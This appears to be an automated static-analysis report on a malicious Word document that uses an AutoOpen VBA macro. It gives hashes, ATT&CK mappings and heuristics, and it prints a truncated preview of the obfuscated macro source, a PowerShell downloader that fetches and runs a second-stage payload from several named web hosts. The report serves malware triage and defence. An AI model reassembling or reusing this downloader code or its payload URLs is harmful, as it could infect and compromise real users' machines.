Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c39ecfe9107f994d…

MALICIOUS

Office (OLE)

90.0 KB Created: 2017-11-09 05:20:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: c7f5754f8ea68642541c1e1c70d2e5fc SHA-1: 192d5744ffe40d2c3bb319b01a5155d02f3a40b4 SHA-256: c39ecfe9107f994de344e40420e1e2c2bb4d1cf7cc51c84381daf890456b5f87
184 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros. The AutoOpen macro triggers a Shell() call, indicating an attempt to execute arbitrary code. The VBA script is heavily obfuscated but appears to download a second-stage payload from the URL http://www.eoskin. The presence of the AutoOpen macro and the Shell() call strongly suggest this document was delivered as a spearphishing attachment.

Heuristics 7

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 92,160 bytes but its declared streams total only 35,458 bytes — 56,702 bytes (62%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.eoskin In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17083 bytes
SHA-256: c6b05be6477927d484da47151f2219dcb9d55a49ff5b5f38694e8c80bd8dff24
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 15 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DFDBnUzTh"
Function PZukBFBaU()
unlNIsK = "" + hNVEqvv + Mid("naR]82+[cHaR]54),[stRING][cHaR]36).rE'+'plAcE(([cHaR]120+[cHaR]114+[cHaR'+3qw2JIdiw9zqiLs48QUo0WQsI80JbnYSKf", 2, 73) + ivIzYdo + OMlnnQt
LwwJZzo = "" + cHDpZvX + Mid("pHJ84fn58zh72rh;bxrh+xrhr'+'xrh+xrheaP4'+'v+P4vk;}'+'P4'+'v+P4vcaxr'+'h+xrhtch{write-hxrh'+'+xrhost cxrh+xrhw0_P4v+P4vxr'+'h+'+'x'+'rhJcmURSoNt2pZJfn", 14, 121) + fQYNwHi + YZRjtRa
WsrIBZGLk = "" + kzqwrHF + Mid("SYOqtzXlDBYZ']104),[stRING][cHaR]39).rEplAcE(P4v7qfP4v,[stRING]['+'cHaR]124)T32 IEx').R3cCY", 13, 75) + qXzLnDq + cDWkEcS
MKDkPj = "" + svaStwj + Mid("lkvfq4vVpu+xrjMWzwinfOO", 11, 3) + DRcPBdh + qCiHKkJ
URACwUPvOz = "" + KmiTSkf + Mid("Es3WloFvC2rhJ0+[CHAR]102),'+'[CHAR]39-rePLAce  xrhcw0xrh,[CHAR]36-CREplaCexrhhXoxrh,kmdX2AYsmE", 14, 71) + DoljFKH + smkEJzc
acKjSAsiDB = "" + YrSZNPw + Mid("TYQhSFrhuxrh'+'+xrhas =xrh+xrh xrAw0Vo LVCDO639Ghj8o3AjJoDK5sU5Di", 7, 27) + jOzMfvG + YzwLwXn
jqBKJP = "" + lklMnPk + Mid("Oimect rMucCJzzllAIRFmdaNKzGVXu6fXj4T", 4, 5) + wzlhbhC + VLQVEoT
ZOhwuwtH = "" + amjYzZL + Mid("E5Sw7NtV(mPfxrh+xrh,xrh+xrhmPx'+'rh+xrhfxrh+xrh)xrh+xrh;cw0karapas =xrh+xrh cw0nxrh+xrhsxrh+xrhaxrh+xrhdasd.nextxrh+xrh(xrh+xrh1, 34xrh+xrh3xrh+xrh24xrh+xrh5);xrh+xrhcw0xrh+P4v+P4vxrhhxrhP4v+P4v+x7T1h5oirGoEmjIl", 9, 188) + hVtziqY + itvZZbf
JrITL = "" + ljotwXp + Mid("8ELh.exrhP4v+P4v+xrhxem'+'Pfxrh+xrh;foxrh+xrhrexrh+xrhaxrh+xrhchxrh+'+'xrh(cw0abc iP4v+P4vxrh+xrhnxrh+xrh cwP4v+P4'+'vxrh+xr'+'hP4v+P4v0bcd){try{xrh+'+'xrhcw0xrhK5HwiHkn", 4, 158) + BRPLqnW + zSGkjzT
LSJZADdV = "" + lfdHkRE + Mid("a NCfPx'+'rh)  -rePLAce ([CHAR]109'+'+[CHP4v+P4vAR]8620JJF", 7, 46) + BWtszmQ + vGYlKXY
FLiiF = "" + GbOCJGu + Mid("GM9sSBIhmPf xrhP4v+PoMJ1n8aHsR9l", 8, 13) + wnMvuCl + KBolqNc
UMFcr = "" + WIOScGf + Mid("pKG3anxrh+xrhdxrh+xP'+'4v+P4vrhoxrh+P4v+P4vxrhmxrP4v+P4vh+xrh;cxrh+xrhw0bcdP'+'4v+P4v = mPfhttp://www.eoskin'+'.cnxrh+xrh/dxrh+xP4v+P4vrh/P4v+P4v,hxrh+'+'xrhttpxrh+xrh://'+'febaCIAYHZ2QdQWjhb22", 5, 173) + zLwRlRB + zctTwwf
vXjPSSldVY = "" + WYlVfwT + Mid("sTkGT9qK (' (P4v((xrhcw'+'0fxrh+xrhranc = new-oxrh+xrhbjectxrh+xrh SyP4v+P4vstem.Net.WebCli'+'enxrh+xrht;cxrh+xrhwxrh+xrhP4v+P4v0nsadxrh+xrhasxrh+xrhd '+'=xrh+xrh new'+'-'+'objULoDI", 9, 168) + iTsdpEJ + IPWDQmj
wLGlUErlBkI = "" + icRjRzF + Mid("rMX22I37ITwEpLAce('P4v',[sTRING][CHar]39).REpLAce(([CHar]84+[CHar]51+[CHar]50),'|') | &( $env:cOmSPec[4,15,25]-Join'')VIAFd", 12, 107) + kWQfQkw + LizsAji
XIFlMQR = "" + mhVilFF + Mid("2mGGV70lvC0PQY6ihtxrh+xr'+'hep.coxrh+xrhmx'+'rh+xrh/'+'Sxrh+x'+'rhSbTyrS/xrh+xrhmPf.Splxrh+xrhitY616Aaj", 18, 79) + jQIhpXR + GiSZmYH
zbTvYUJiX = "" + WSvcDlT + Mid("zTjkjinrhm/ilZxrh+xrh/xrh+xrh,P4v+P4vxrh+xr'+'hhxrh+xrhttpxrh+xrh:xrP'+azf09FJkfE0JJvQtpqkSiDqqYzXSnjv", 8, 64) + PUDLbUo + SiBIlEV
rqMSlCDaI = "" + iKVWOwv + Mid("fd[CHAR]92)7qf&( XR6sHeLLID[1]+XR6sheLLiD[13]P4v+P4v+xrhxxP4v+P4vrh)P4v).rEplAcE(([cHaR]88+[cHtovrqvj13zwC", 3, 92) + BJQcKch + vGjsuRp
jbEpSCN = "" + mPpYJbG + Mid("WbL7OtU'4v+P4vh+xrh//vixrh+xrhrtualdxrhP4v+P4v+xrhoorxrP4v+P4vh+xrhsNi7SD", 8, 61) + wjbtOoT + ZcwpLwv
jiYkGPpRpa = "" + CVINZRN + Mid("SQJqCMjYh3v4iBBD7XW0XjU4T3Js9vM4GJGu.nexrh+xrht/'+'YAqJxrh+xrh/xrh+xrh,htxrh+xrhtpxrh+xrh://www.emont-P4v+P4vdP4v+P4vnxr'+'h+xrhepr.xrh+xrhcom/'+'DZonxrh+xr'+'htEn/,httP4v+P4vp://www.ecobui'+'ldsolutionsxrh+xrhgh.coxrh+x5mt", 37, 184) + XEEuJhi + hrFCvLs
DbMzKwl = "" + jzZdMzM + Mid("NsoJ7JRboWKnzn9KYBh+x'+'rhcw0enxrh+xrhv:xrh+xrhpxrhP4v+P4'+'v+xrhublxrh'+'+xrhic +xP4v+P4vrhP4v+P4v+xP4v+P4vrh mPfhXoxrh+xrMDjPNJ", 19, 105) + YROVfRm + FfIIYdZ
bcOXuM = "" + cSwtNWf + Mid("M13oke-Ixrh+xrhtemxrh+P4v'+'+P4vxrh(cxrhP4v+P4v'+'+xrhw0xrh+'+'xrhhP4v+P4vuaxr'+'h+xr'+'hs)xrh'+'+xiiYbZr99DoTlFqHvvd7R0ZW8wzS", 4, 96) + ohGQMdC + brjwBUn
KSvpp = "" + JfQDjWo + Mid("aQwd8Zb),xrh+xrh cxrh
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.